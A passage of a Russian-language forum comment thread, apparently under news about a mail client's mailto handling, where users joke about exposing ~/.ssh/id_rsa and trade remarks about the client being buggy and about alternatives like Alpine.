Причем здесь новость? я отвечал на вопрос:

>Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #102 Ответы: #104

104. Сообщение от тоже Аноним (ok), 21-Авг-20, 23:17   +/
> Причем здесь новость? я отвечал на вопрос:

Это другое дело. Поздравляю, на этот вопрос вы ответили правильно. Вы молодец.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103

105. Сообщение от Аноним (105), 22-Авг-20, 10:56   +/
Зачем для всех, дорогой, речь про вполне определённый mailto.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

106. Сообщение от Убить_Криса (?), 23-Авг-20, 09:13   +/
Очень глючный
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20

107. Сообщение от rvs2016 (ok), 23-Авг-20, 22:13   +/
pine! Alpine!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

108. Сообщение от rvs2016 (ok), 23-Авг-20, 22:17   +/
> Да ну нфиг слишком сложно пишите просто сразу
> куда слать этот ~/.ssh/id_rsa файл?

Это всё-равно сложно.
Пишите лусша сразу куда слать ДЕНЬГИ :-)))

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36

109. Сообщение от ___ (??), 24-Авг-20, 07:55   +/
Тащить себе половину KDE ради почтовика?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2020 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру